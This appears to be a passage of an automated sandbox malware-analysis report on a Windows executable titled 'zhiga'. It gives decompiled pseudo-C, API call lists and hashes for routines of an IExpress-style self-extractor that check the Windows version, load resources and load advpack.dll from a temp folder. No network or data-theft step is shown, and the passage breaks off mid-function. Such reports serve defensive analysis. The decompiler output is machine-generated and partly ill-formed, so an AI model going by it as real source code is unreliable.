                                                          0x01093a46
                                                          0x01093a57
                                                          0x01093a5d
                                                          0x01093a63
                                                          0x01093a6a
                                                          0x01093a91
                                                          0x01093a9a
                                                          0x01093ad8
                                                          0x01093b13
                                                          0x01093b19
                                                          0x01093b1b
                                                          0x00000000
                                                          0x01093b21
                                                          0x01093ae7
                                                          0x01093af4
                                                          0x01093afc
                                                          0x00000000
                                                          0x00000000
                                                          0x01093afe
                                                          0x01093a87
                                                          0x00000000
                                                          0x01093a87
                                                          0x01093aa8
                                                          0x01093ab3
                                                          0x01093ab9
                                                          0x00000000
                                                          0x01093ab9
                                                          0x01093a78
                                                          0x01093a82
                                                          0x00000000

                                                          APIs
                                                            • Part of subcall function 0109468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 010946A0
                                                            • Part of subcall function 0109468F: SizeofResource.KERNEL32(00000000,00000000,?,01092D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 010946A9
                                                            • Part of subcall function 0109468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 010946C3
                                                            • Part of subcall function 0109468F: LoadResource.KERNEL32(00000000,00000000,?,01092D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 010946CC
                                                            • Part of subcall function 0109468F: LockResource.KERNEL32(00000000,?,01092D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 010946D3
                                                            • Part of subcall function 0109468F: memcpy_s.MSVCRT ref: 010946E5
                                                            • Part of subcall function 0109468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 010946EF
                                                          • LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000,01092F64,?,00000002,00000000), ref: 01093A5D
                                                          • LocalFree.KERNEL32(00000000,00000000,00000010,00000000,00000000), ref: 01093AB3
                                                            • Part of subcall function 010944B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 01094518
                                                            • Part of subcall function 010944B9: MessageBoxA.USER32(?,?,zhiga,00010010), ref: 01094554
                                                            • Part of subcall function 01096285: GetLastError.KERNEL32(01095BBC), ref: 01096285
                                                          • lstrcmpA.KERNEL32(<None>,00000000), ref: 01093AD0
                                                          • LocalFree.KERNEL32 ref: 01093B13
                                                            • Part of subcall function 01096517: FindResourceA.KERNEL32(01090000,000007D6,00000005), ref: 0109652A
                                                            • Part of subcall function 01096517: LoadResource.KERNEL32(01090000,00000000,?,?,01092EE8,00000000,010919E0,00000547,0000083E,?,?,?,?,?,?,?), ref: 01096538
                                                            • Part of subcall function 01096517: DialogBoxIndirectParamA.USER32(01090000,00000000,00000547,010919E0,00000000), ref: 01096557
                                                            • Part of subcall function 01096517: FreeResource.KERNEL32(00000000,?,?,01092EE8,00000000,010919E0,00000547,0000083E,?,?,?,?,?,?,?,00000002), ref: 01096560
                                                          • LocalFree.KERNEL32(00000000,01093100,00000000,00000000), ref: 01093AF4
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.443134906.0000000001091000.00000020.00000001.01000000.00000004.sdmp, Offset: 01090000, based on PE: true
                                                          • Associated: 00000001.00000002.443126553.0000000001090000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.443146015.0000000001098000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.443153856.000000000109A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.443153856.000000000109C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_1090000_bjAg.jbxd
                                                          Similarity
                                                          • API ID: Resource$Free$Local$FindLoad$AllocDialogErrorIndirectLastLockMessageParamSizeofStringlstrcmpmemcpy_s
                                                          • String ID: <None>$LICENSE
                                                          • API String ID: 2414642746-383193767
                                                          • Opcode ID: 628c7f7d23414fe5c5d71dcccaad7fb830272c0d2bcc13f120916ebef346417e
                                                          • Instruction ID: 1d8cedc2612d0a9c50342ff855616d7c2c45a72d799c8e040ba02d42b24d1a6a
                                                          • Opcode Fuzzy Hash: 628c7f7d23414fe5c5d71dcccaad7fb830272c0d2bcc13f120916ebef346417e
                                                          • Instruction Fuzzy Hash: FA119D70701201ABDF34AF769D38E5B3AF9FBD9750B00442EB5C5DA298DA7F8801AB54
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 94%
                                                          			E010924E0(void* __ebx) {
                                                          				signed int _v8;
                                                          				char _v268;
                                                          				void* __edi;
                                                          				void* __esi;
                                                          				signed int _t7;
                                                          				void* _t20;
                                                          				long _t26;
                                                          				signed int _t27;
                                                          
                                                          				_t20 = __ebx;
                                                          				_t7 =  *0x1098004; // 0x8a9c601
                                                          				_v8 = _t7 ^ _t27;
                                                          				_t25 = 0x104;
                                                          				_t26 = 0;
                                                          				if(GetWindowsDirectoryA( &_v268, 0x104) != 0) {
                                                          					E0109658A( &_v268, 0x104, "wininit.ini");
                                                          					WritePrivateProfileStringA(0, 0, 0,  &_v268);
                                                          					_t25 = _lopen( &_v268, 0x40);
                                                          					if(_t25 != 0xffffffff) {
                                                          						_t26 = _llseek(_t25, 0, 2);
                                                          						_lclose(_t25);
                                                          					}
                                                          				}
                                                          				return E01096CE0(_t26, _t20, _v8 ^ _t27, 0x104, _t25, _t26);
                                                          			}











                                                          0x010924e0
                                                          0x010924eb
                                                          0x010924f2
                                                          0x010924f7
                                                          0x01092504
                                                          0x0109250e
                                                          0x0109251d
                                                          0x0109252c
                                                          0x01092541
                                                          0x01092546
                                                          0x01092553
                                                          0x01092555
                                                          0x01092555
                                                          0x01092546
                                                          0x0109256c

                                                          APIs
                                                          • GetWindowsDirectoryA.KERNEL32(?,00000104,00000000,00000000), ref: 01092506
                                                          • WritePrivateProfileStringA.KERNEL32(00000000,00000000,00000000,?), ref: 0109252C
                                                          • _lopen.KERNEL32(?,00000040), ref: 0109253B
                                                          • _llseek.KERNEL32(00000000,00000000,00000002), ref: 0109254C
                                                          • _lclose.KERNEL32(00000000), ref: 01092555
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.443134906.0000000001091000.00000020.00000001.01000000.00000004.sdmp, Offset: 01090000, based on PE: true
                                                          • Associated: 00000001.00000002.443126553.0000000001090000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.443146015.0000000001098000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.443153856.000000000109A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.443153856.000000000109C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_1090000_bjAg.jbxd
                                                          Similarity
                                                          • API ID: DirectoryPrivateProfileStringWindowsWrite_lclose_llseek_lopen
                                                          • String ID: wininit.ini
                                                          • API String ID: 3273605193-4206010578
                                                          • Opcode ID: d4d4a46f451d9b4a425caf3f7d4dc2b8123da354180139c1ffc7cf0f1590385b
                                                          • Instruction ID: 1ed6a957e572f70a0f5b962be2255a5f591d826cd30ee463a04f85297e074496
                                                          • Opcode Fuzzy Hash: d4d4a46f451d9b4a425caf3f7d4dc2b8123da354180139c1ffc7cf0f1590385b
                                                          • Instruction Fuzzy Hash: 96017931700118A7DB309A699C2CEDF7B7CEB95750F000195FA85D3144DA794E55CB90
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 75%
                                                          			E010936EE(CHAR* __ecx) {
                                                          				signed int _v8;
                                                          				char _v268;
                                                          				struct _OSVERSIONINFOA _v416;
                                                          				signed int _v420;
                                                          				signed int _v424;
                                                          				CHAR* _v428;
                                                          				CHAR* _v432;
                                                          				signed int _v436;
                                                          				CHAR* _v440;
                                                          				void* __ebx;
                                                          				void* __edi;
                                                          				void* __esi;
                                                          				signed int _t72;
                                                          				CHAR* _t77;
                                                          				CHAR* _t91;
                                                          				CHAR* _t94;
                                                          				int _t97;
                                                          				CHAR* _t98;
                                                          				signed char _t99;
                                                          				CHAR* _t104;
                                                          				signed short _t107;
                                                          				signed int _t109;
                                                          				short _t113;
                                                          				void* _t114;
                                                          				signed char _t115;
                                                          				short _t119;
                                                          				CHAR* _t123;
                                                          				CHAR* _t124;
                                                          				CHAR* _t129;
                                                          				signed int _t131;
                                                          				signed int _t132;
                                                          				CHAR* _t135;
                                                          				CHAR* _t138;
                                                          				signed int _t139;
                                                          
                                                          				_t72 =  *0x1098004; // 0x8a9c601
                                                          				_v8 = _t72 ^ _t139;
                                                          				_v416.dwOSVersionInfoSize = 0x94;
                                                          				_t115 = __ecx;
                                                          				_t135 = 0;
                                                          				_v432 = __ecx;
                                                          				_t138 = 0;
                                                          				if(GetVersionExA( &_v416) != 0) {
                                                          					_t133 = _v416.dwMajorVersion;
                                                          					_t119 = 2;
                                                          					_t77 = _v416.dwPlatformId - 1;
                                                          					__eflags = _t77;
                                                          					if(_t77 == 0) {
                                                          						_t119 = 0;
                                                          						__eflags = 1;
                                                          						 *0x1098184 = 1;
                                                          						 *0x1098180 = 1;
                                                          						L13:
                                                          						 *0x1099a40 = _t119;
                                                          						L14:
                                                          						__eflags =  *0x1098a34 - _t138; // 0x0
                                                          						if(__eflags != 0) {
                                                          							goto L66;
                                                          						}
                                                          						__eflags = _t115;
                                                          						if(_t115 == 0) {
                                                          							goto L66;
                                                          						}
                                                          						_v428 = _t135;
                                                          						__eflags = _t119;
                                                          						_t115 = _t115 + ((0 | _t119 != 0x00000000) - 0x00000001 & 0x0000003c) + 4;
                                                          						_t11 =  &_v420;
                                                          						 *_t11 = _v420 & _t138;
                                                          						__eflags =  *_t11;
                                                          						_v440 = _t115;
                                                          						do {
                                                          							_v424 = _t135 * 0x18;
                                                          							_v436 = E01092A89(_v416.dwMajorVersion, _v416.dwMinorVersion,  *((intOrPtr*)(_t135 * 0x18 + _t115)),  *((intOrPtr*)(_t135 * 0x18 + _t115 + 4)));
                                                          							_t91 = E01092A89(_v416.dwMajorVersion, _v416.dwMinorVersion,  *((intOrPtr*)(_v424 + _t115 + 0xc)),  *((intOrPtr*)(_v424 + _t115 + 0x10)));
                                                          							_t123 = _v436;
                                                          							_t133 = 0x54d;
                                                          							__eflags = _t123;
                                                          							if(_t123 < 0) {
                                                          								L32:
                                                          								__eflags = _v420 - 1;
                                                          								if(_v420 == 1) {
                                                          									_t138 = 0x54c;
                                                          									L36:
                                                          									__eflags = _t138;
                                                          									if(_t138 != 0) {
                                                          										L40:
                                                          										__eflags = _t138 - _t133;
                                                          										if(_t138 == _t133) {
                                                          											L30:
                                                          											_v420 = _v420 & 0x00000000;
                                                          											_t115 = 0;
                                                          											_v436 = _v436 & 0x00000000;
                                                          											__eflags = _t138 - _t133;
                                                          											_t133 = _v432;
                                                          											if(__eflags != 0) {
                                                          												_t124 = _v440;
                                                          											} else {
                                                          												_t124 = _t133[0x80] + 0x84 + _t135 * 0x3c + _t133;
                                                          												_v420 =  &_v268;
                                                          											}
                                                          											__eflags = _t124;
                                                          											if(_t124 == 0) {
                                                          												_t135 = _v436;
                                                          											} else {
                                                          												_t99 = _t124[0x30];
                                                          												_t135 = _t124[0x34] + 0x84 + _t133;
                                                          												__eflags = _t99 & 0x00000001;
                                                          												if((_t99 & 0x00000001) == 0) {
                                                          													asm("sbb ebx, ebx");
                                                          													_t115 =  ~(_t99 & 2) & 0x00000101;
                                                          												} else {
                                                          													_t115 = 0x104;
                                                          												}
                                                          											}
                                                          											__eflags =  *0x1098a38 & 0x00000001;
                                                          											if(( *0x1098a38 & 0x00000001) != 0) {
                                                          												L64:
                                                          												_push(0);
                                                          												_push(0x30);
                                                          												_push(_v420);
                                                          												_push("zhiga");
                                                          												goto L65;
                                                          											} else {
                                                          												__eflags = _t135;
                                                          												if(_t135 == 0) {
                                                          													goto L64;
                                                          												}
                                                          												__eflags =  *_t135;
                                                          												if( *_t135 == 0) {
                                                          													goto L64;
                                                          												}
                                                          												MessageBeep(0);
                                                          												_t94 = E0109681F(_t115);
                                                          												__eflags = _t94;
                                                          												if(_t94 == 0) {
                                                          													L57:
                                                          													0x180030 = 0x30;
                                                          													L58:
                                                          													_t97 = MessageBoxA(0, _t135, "zhiga", 0x00180030 | _t115);
                                                          													__eflags = _t115 & 0x00000004;
                                                          													if((_t115 & 0x00000004) == 0) {
                                                          														__eflags = _t115 & 0x00000001;
                                                          														if((_t115 & 0x00000001) == 0) {
                                                          															goto L66;
                                                          														}
                                                          														__eflags = _t97 - 1;
                                                          														L62:
                                                          														if(__eflags == 0) {
                                                          															_t138 = 0;
                                                          														}
                                                          														goto L66;
                                                          													}
                                                          													__eflags = _t97 - 6;
                                                          													goto L62;
                                                          												}
                                                          												_t98 = E010967C9(_t124, _t124);
                                                          												__eflags = _t98;
                                                          												if(_t98 == 0) {
                                                          													goto L57;
                                                          												}
                                                          												goto L58;
                                                          											}
                                                          										}
                                                          										__eflags = _t138 - 0x54c;
                                                          										if(_t138 == 0x54c) {
                                                          											goto L30;
                                                          										}
                                                          										__eflags = _t138;
                                                          										if(_t138 == 0) {
                                                          											goto L66;
                                                          										}
                                                          										_t135 = 0;
                                                          										__eflags = 0;
                                                          										goto L44;
                                                          									}
                                                          									L37:
                                                          									_t129 = _v432;
                                                          									__eflags = _t129[0x7c];
                                                          									if(_t129[0x7c] == 0) {
                                                          										goto L66;
                                                          									}
                                                          									_t133 =  &_v268;
                                                          									_t104 = E010928E8(_t129,  &_v268, _t129,  &_v428);
                                                          									__eflags = _t104;
                                                          									if(_t104 != 0) {
                                                          										goto L66;
                                                          									}
                                                          									_t135 = _v428;
                                                          									_t133 = 0x54d;
                                                          									_t138 = 0x54d;
                                                          									goto L40;
                                                          								}
                                                          								goto L33;
                                                          							}
                                                          							__eflags = _t91;
                                                          							if(_t91 > 0) {
                                                          								goto L32;
                                                          							}
                                                          							__eflags = _t123;
                                                          							if(_t123 != 0) {
                                                          								__eflags = _t91;
                                                          								if(_t91 != 0) {
                                                          									goto L37;
                                                          								}
                                                          								__eflags = (_v416.dwBuildNumber & 0x0000ffff) -  *((intOrPtr*)(_v424 + _t115 + 0x14));
                                                          								L27:
                                                          								if(__eflags <= 0) {
                                                          									goto L37;
                                                          								}
                                                          								L28:
                                                          								__eflags = _t135;
                                                          								if(_t135 == 0) {
                                                          									goto L33;
                                                          								}
                                                          								_t138 = 0x54c;
                                                          								goto L30;
                                                          							}
                                                          							__eflags = _t91;
                                                          							_t107 = _v416.dwBuildNumber;
                                                          							if(_t91 != 0) {
                                                          								_t131 = _v424;
                                                          								__eflags = (_t107 & 0x0000ffff) -  *((intOrPtr*)(_t131 + _t115 + 8));
                                                          								if((_t107 & 0x0000ffff) >=  *((intOrPtr*)(_t131 + _t115 + 8))) {
                                                          									goto L37;
                                                          								}
                                                          								goto L28;
                                                          							}
                                                          							_t132 = _t107 & 0x0000ffff;
                                                          							_t109 = _v424;
                                                          							__eflags = _t132 -  *((intOrPtr*)(_t109 + _t115 + 8));
                                                          							if(_t132 <  *((intOrPtr*)(_t109 + _t115 + 8))) {
                                                          								goto L28;
                                                          							}
                                                          							__eflags = _t132 -  *((intOrPtr*)(_t109 + _t115 + 0x14));
                                                          							goto L27;
                                                          							L33:
                                                          							_t135 =  &(_t135[1]);
                                                          							_v428 = _t135;
                                                          							_v420 = _t135;
                                                          							__eflags = _t135 - 2;
                                                          						} while (_t135 < 2);
                                                          						goto L36;
                                                          					}
                                                          					__eflags = _t77 == 1;
                                                          					if(_t77 == 1) {
                                                          						 *0x1099a40 = _t119;
                                                          						 *0x1098184 = 1;
                                                          						 *0x1098180 = 1;
                                                          						__eflags = _t133 - 3;
                                                          						if(_t133 > 3) {
                                                          							__eflags = _t133 - 5;
                                                          							if(_t133 < 5) {
                                                          								goto L14;
                                                          							}
                                                          							_t113 = 3;
                                                          							_t119 = _t113;
                                                          							goto L13;
                                                          						}
                                                          						_t119 = 1;
                                                          						_t114 = 3;
                                                          						 *0x1099a40 = 1;
                                                          						__eflags = _t133 - _t114;
                                                          						if(__eflags < 0) {
                                                          							L9:
                                                          							 *0x1098184 = _t135;
                                                          							 *0x1098180 = _t135;
                                                          							goto L14;
                                                          						}
                                                          						if(__eflags != 0) {
                                                          							goto L14;
                                                          						}
                                                          						__eflags = _v416.dwMinorVersion - 0x33;
                                                          						if(_v416.dwMinorVersion >= 0x33) {
                                                          							goto L14;
                                                          						}
                                                          						goto L9;
                                                          					}
                                                          					_t138 = 0x4ca;
                                                          					goto L44;
                                                          				} else {
                                                          					_t138 = 0x4b4;
                                                          					L44:
                                                          					_push(_t135);
                                                          					_push(0x10);
                                                          					_push(_t135);
                                                          					_push(_t135);
                                                          					L65:
                                                          					_t133 = _t138;
                                                          					E010944B9(0, _t138);
                                                          					L66:
                                                          					return E01096CE0(0 | _t138 == 0x00000000, _t115, _v8 ^ _t139, _t133, _t135, _t138);
                                                          				}
                                                          			}





































                                                          0x010936f9
                                                          0x01093700
                                                          0x0109370c
                                                          0x01093716
                                                          0x01093718
                                                          0x0109371b
                                                          0x01093721
                                                          0x0109372b
                                                          0x0109373d
                                                          0x01093745
                                                          0x01093746
                                                          0x01093746
                                                          0x01093749
                                                          0x010937ab
                                                          0x010937ad
                                                          0x010937ae
                                                          0x010937b3
                                                          0x010937b8
                                                          0x010937b8
                                                          0x010937bf
                                                          0x010937bf
                                                          0x010937c5
                                                          0x00000000
                                                          0x00000000
                                                          0x010937cb
                                                          0x010937cd
                                                          0x00000000
                                                          0x00000000
                                                          0x010937d5
                                                          0x010937db
                                                          0x010937e8
                                                          0x010937ea
                                                          0x010937ea
                                                          0x010937ea
                                                          0x010937f0
                                                          0x010937f6
                                                          0x01093805
                                                          0x01093817
                                                          0x0109382b
                                                          0x01093830
                                                          0x01093836
                                                          0x0109383b
                                                          0x0109383d
                                                          0x010938eb
                                                          0x010938eb
                                                          0x010938f2
                                                          0x0109390c
                                                          0x01093911
                                                          0x01093911
                                                          0x01093913
                                                          0x0109394d
                                                          0x0109394d
                                                          0x0109394f
                                                          0x010938a9
                                                          0x010938a9
                                                          0x010938b0
                                                          0x010938b2
                                                          0x010938b9
                                                          0x010938bb
                                                          0x010938c1
                                                          0x01093975
                                                          0x010938c7
                                                          0x010938de
                                                          0x010938e0
                                                          0x010938e0
                                                          0x0109397b
                                                          0x0109397d
                                                          0x010939a9
                                                          0x0109397f
                                                          0x01093982
                                                          0x0109398b
                                                          0x0109398d
                                                          0x0109398f
                                                          0x0109399f
                                                          0x010939a1
                                                          0x01093991
                                                          0x01093991
                                                          0x01093991
                                                          0x0109398f
                                                          0x010939af
                                                          0x010939b6
                                                          0x01093a0f
                                                          0x01093a0f
                                                          0x01093a11
                                                          0x01093a13
                                                          0x01093a19
                                                          0x00000000
                                                          0x010939b8
                                                          0x010939b8
                                                          0x010939ba
                                                          0x00000000
                                                          0x00000000
                                                          0x010939bc
                                                          0x010939bf
                                                          0x00000000
                                                          0x00000000
                                                          0x010939c3
                                                          0x010939c9
                                                          0x010939ce
                                                          0x010939d0
                                                          0x010939e3
                                                          0x010939e5
                                                          0x010939e6
                                                          0x010939f1
                                                          0x010939f7
                                                          0x010939fa
                                                          0x01093a01
                                                          0x01093a04
                                                          0x00000000
                                                          0x00000000
                                                          0x01093a06
                                                          0x01093a09
                                                          0x01093a09
                                                          0x01093a0b
                                                          0x01093a0b
                                                          0x00000000
                                                          0x01093a09
                                                          0x010939fc
                                                          0x00000000
                                                          0x010939fc
                                                          0x010939d3
                                                          0x010939d8
                                                          0x010939da
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x010939dc
                                                          0x010939b6
                                                          0x01093955
                                                          0x0109395b
                                                          0x00000000
                                                          0x00000000
                                                          0x01093961
                                                          0x01093963
                                                          0x00000000
                                                          0x00000000
                                                          0x01093969
                                                          0x01093969
                                                          0x00000000
                                                          0x01093969
                                                          0x01093915
                                                          0x01093915
                                                          0x0109391b
                                                          0x0109391f
                                                          0x00000000
                                                          0x00000000
                                                          0x0109392d
                                                          0x01093933
                                                          0x01093938
                                                          0x0109393a
                                                          0x00000000
                                                          0x00000000
                                                          0x01093940
                                                          0x01093946
                                                          0x0109394b
                                                          0x00000000
                                                          0x0109394b
                                                          0x00000000
                                                          0x010938f2
                                                          0x01093843
                                                          0x01093845
                                                          0x00000000
                                                          0x00000000
                                                          0x0109384b
                                                          0x0109384d
                                                          0x01093883
                                                          0x01093885
                                                          0x00000000
                                                          0x00000000
                                                          0x0109389a
                                                          0x0109389e
                                                          0x0109389e
                                                          0x00000000
                                                          0x00000000
                                                          0x010938a0
                                                          0x010938a0
                                                          0x010938a2
                                                          0x00000000
                                                          0x00000000
                                                          0x010938a4
                                                          0x00000000
                                                          0x010938a4
                                                          0x0109384f
                                                          0x01093851
                                                          0x01093857
                                                          0x0109386e
                                                          0x01093877
                                                          0x0109387b
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x01093881
                                                          0x01093859
                                                          0x0109385c
                                                          0x01093862
                                                          0x01093866
                                                          0x00000000
                                                          0x00000000
                                                          0x01093868
                                                          0x00000000
                                                          0x010938f4
                                                          0x010938f4
                                                          0x010938f5
                                                          0x010938fb
                                                          0x01093901
                                                          0x01093901
                                                          0x00000000
                                                          0x0109390a
                                                          0x0109374b
                                                          0x0109374e
                                                          0x0109375c
                                                          0x01093764
                                                          0x01093769
                                                          0x0109376e
                                                          0x01093771
                                                          0x0109379c
                                                          0x0109379f
                                                          0x00000000
                                                          0x00000000
                                                          0x010937a3
                                                          0x010937a4
                                                          0x00000000
                                                          0x010937a4
                                                          0x01093773
                                                          0x01093777
                                                          0x01093778
                                                          0x0109377f
                                                          0x01093781
                                                          0x0109378e
                                                          0x0109378e
                                                          0x01093794
                                                          0x00000000
                                                          0x01093794
                                                          0x01093783
                                                          0x00000000
                                                          0x00000000
                                                          0x01093785
                                                          0x0109378c
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x0109378c
                                                          0x01093750
                                                          0x00000000
                                                          0x0109372d
                                                          0x0109372d
                                                          0x0109396b
                                                          0x0109396b
                                                          0x0109396c
                                                          0x0109396e
                                                          0x0109396f
                                                          0x01093a1e
                                                          0x01093a1e
                                                          0x01093a22
                                                          0x01093a27
                                                          0x01093a3e
                                                          0x01093a3e

                                                          APIs
                                                          • GetVersionExA.KERNEL32(?,00000000,?,?), ref: 01093723
                                                          • MessageBeep.USER32(00000000), ref: 010939C3
                                                          • MessageBoxA.USER32(00000000,00000000,zhiga,00000030), ref: 010939F1
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.443134906.0000000001091000.00000020.00000001.01000000.00000004.sdmp, Offset: 01090000, based on PE: true
                                                          • Associated: 00000001.00000002.443126553.0000000001090000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.443146015.0000000001098000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.443153856.000000000109A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.443153856.000000000109C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_1090000_bjAg.jbxd
                                                          Similarity
                                                          • API ID: Message$BeepVersion
                                                          • String ID: 3$zhiga
                                                          • API String ID: 2519184315-2183486482
                                                          • Opcode ID: 8a050afa2ca82b738977f18320422bace9cd82c6fbc77c9da27cc63b850d8abb
                                                          • Instruction ID: 7aa3ee42c36db00fa5299bf131ceca7ba4e1bf4c81d3999db19d2965f24667ad
                                                          • Opcode Fuzzy Hash: 8a050afa2ca82b738977f18320422bace9cd82c6fbc77c9da27cc63b850d8abb
                                                          • Instruction Fuzzy Hash: D191B071E012259BEFB58A39C8A07EAB7E5FB45304F0540EAD9C9DF241D7398D80AF41
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 83%
                                                          			E01096495(void* __ebx, void* __ecx, void* __esi, void* __eflags) {
                                                          				signed int _v8;
                                                          				char _v268;
                                                          				void* __edi;
                                                          				signed int _t9;
                                                          				signed char _t14;
                                                          				struct HINSTANCE__* _t15;
                                                          				void* _t18;
                                                          				CHAR* _t26;
                                                          				void* _t27;
                                                          				signed int _t28;
                                                          
                                                          				_t27 = __esi;
                                                          				_t18 = __ebx;
                                                          				_t9 =  *0x1098004; // 0x8a9c601
                                                          				_v8 = _t9 ^ _t28;
                                                          				_push(__ecx);
                                                          				E01091781( &_v268, 0x104, __ecx, "C:\Users\alfons\AppData\Local\Temp\IXP001.TMP\");
                                                          				_t26 = "advpack.dll";
                                                          				E0109658A( &_v268, 0x104, _t26);
                                                          				_t14 = GetFileAttributesA( &_v268);
                                                          				if(_t14 == 0xffffffff || (_t14 & 0x00000010) != 0) {
                                                          					_t15 = LoadLibraryA(_t26);
                                                          				} else {
                                                          					_t15 = LoadLibraryExA( &_v268, 0, 8);
                                                          				}
                                                          				return E01096CE0(_t15, _t18, _v8 ^ _t28, 0x104, _t26, _t27);
                                                          			}













                                                          0x01096495
                                                          0x01096495
                                                          0x010964a0
                                                          0x010964a7
                                                          0x010964ab
                                                          0x010964bd
                                                          0x010964c2
                                                          0x010964d3
                                                          0x010964df
                                                          0x010964e8
                                                          0x01096502
                                                          0x010964ee
                                                          0x010964f9
                                                          0x010964f9
                                                          0x01096516

                                                          APIs
                                                          • GetFileAttributesA.KERNEL32(?,advpack.dll,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,?,00000000), ref: 010964DF
                                                          • LoadLibraryExA.KERNEL32(?,00000000,00000008,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,?,00000000), ref: 010964F9
                                                          • LoadLibraryA.KERNEL32(advpack.dll,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,?,00000000), ref: 01096502
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.443134906.0000000001091000.00000020.00000001.01000000.00000004.sdmp, Offset: 01090000, based on PE: true
                                                          • Associated: 00000001.00000002.443126553.0000000001090000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.443146015.0000000001098000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.443153856.000000000109A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000001.00000002.443153856.000000000109C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_1090000_bjAg.jbxd
                                                          Similarity
                                                          • API ID: LibraryLoad$AttributesFile
                                                          • String ID: C:\Users\user\AppData\Local\Temp\IXP001.TMP\$advpack.dll
                                                          • API String ID: 438848745-1655358546
                                                          • Opcode ID: cefa56c9adaccc9a41143e91bfb494c7aab4cc14815ef16e40850e92783e975a
                                                          • Instruction ID: 4915394003c2ce906b7e31b5ae4b2573182bbb5646d716b663a39799acdc332e
                                                          • Opcode Fuzzy Hash: cefa56c9adaccc9a41143e91bfb494c7aab4cc14815ef16e40850e92783e975a
                                                          • Instruction Fuzzy Hash: 7801D170A00108ABDF60EB64DC69AEE7778EBA5310F400199F5C9931C4DF76AE86DB50
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 100%
                                                          			E010928E8(intOrPtr __ecx, char* __edx, intOrPtr* _a8) {
                                                          				void* _v8;
                                                          				char* _v12;
                                                          				intOrPtr _v16;
                                                          				void* _v20;
                                                          				intOrPtr _v24;
                                                          				int _v28;
                                                          				int _v32;
                                                          				void* _v36;
                                                          				int _v40;
                                                          				void* _v44;
                                                          				intOrPtr _v48;
                                                          				intOrPtr _v52;
                                                          				intOrPtr _v56;
                                                          				intOrPtr _v60;
                                                          				intOrPtr _v64;
                                                          				long _t68;
                                                          				void* _t70;
                                                          				void* _t73;
                                                          				void* _t79;
                                                          				void* _t83;
                                                          				void* _t87;
                                                          				void* _t88;
                                                          				intOrPtr _t93;
                                                          				intOrPtr _t97;
                                                          				intOrPtr _t99;
                                                          				int _t101;
                                                          				void* _t103;
                                                          				void* _t106;
                                                          				void* _t109;
                                                          				void* _t110;
                                                          
                                                          				_v12 = __edx;
                                                          				_t99 = __ecx;
                                                          				_t106 = 0;
                                                          				_v16 = __ecx;
                                                          				_t87 = 0;
                                                          				_t103 = 0;
                                                          				_v20 = 0;
                                                          				if( *((intOrPtr*)(__ecx + 0x7c)) <= 0) {
                                                          					L19:
                                                          					_t106 = 1;
                                                          				} else {
                                                          					_t62 = 0;
                                                          					_v8 = 0;
                                                          					while(1) {
                                                          						_v24 =  *((intOrPtr*)(_t99 + 0x80));
                                                          						if(E01092773(_v12,  *((intOrPtr*)(_t62 + _t99 +  *((intOrPtr*)(_t99 + 0x80)) + 0xbc)) + _t99 + 0x84) == 0) {
                                                          							goto L20;
                                                          						}
                                                          						_t68 = GetFileVersionInfoSizeA(_v12,  &_v32);
                                                          						_v28 = _t68;
                                                          						if(_t68 == 0) {
                                                          							_t99 = _v16;
                                                          							_t70 = _v8 + _t99;
                                                          							_t93 = _v24;
                                                          							_t87 = _v20;
                                                          							if( *((intOrPtr*)(_t70 + _t93 + 0x84)) == _t106 &&  *((intOrPtr*)(_t70 + _t93 + 0x88)) == _t106) {
                                                          								goto L18;
                                                          							}
                                                          						} else {
                                                          							_t103 = GlobalAlloc(0x42, _t68);
                                                          							if(_t103 != 0) {
                                                          								_t73 = GlobalLock(_t103);
                                                          								_v36 = _t73;
                                                          								if(_t73 != 0) {
